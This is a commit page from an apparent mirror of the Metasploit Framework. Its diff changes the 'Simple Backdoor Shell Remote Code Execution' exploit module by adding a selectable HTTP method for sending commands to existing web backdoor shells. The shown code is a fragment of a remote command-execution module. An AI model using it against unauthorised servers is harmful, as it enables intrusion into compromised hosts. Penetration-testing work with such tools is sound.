infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add METHOD to simple_backdoors_exec

bug/bundler_fix
Rory McNamara 2016-01-13 14:42:11 +00:00
parent 889a5d40a1
commit 564b4807a2
1 changed files with 3 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
modules/exploits/multi/http/simple_backdoors_exec.rb
View File

@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Simple Backdoor Shell Remote Code Execution',
'Description' => %q{
This module exploits unauthenticated simple web backdoor shells by leveraging the
common backdoor shell's CMD parameter to execute commands. The SecLists project of
common backdoor shell's vulnerable parameter to execute commands. The SecLists project of
Daniel Miessler and Jason Haddix has a lot of samples for these kind of backdoor shells
which is categorized under Payloads.
},
@ -54,6 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
OptString.new('TARGETURI', [true, 'The path of a backdoor shell', 'cmd.php']),
OptString.new('VAR', [true, 'The command variable', 'cmd']),
OptString.new('METHOD', [true, 'The method to use', 'GET']),
],self.class)
end
@ -68,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
def http_send_command(cmd)
res = send_request_cgi({
'method' => 'GET',
'method' => datastore['METHOD'],
'uri' => normalize_uri(target_uri.path),
'vars_get' => {
datastore['VAR'] => cmd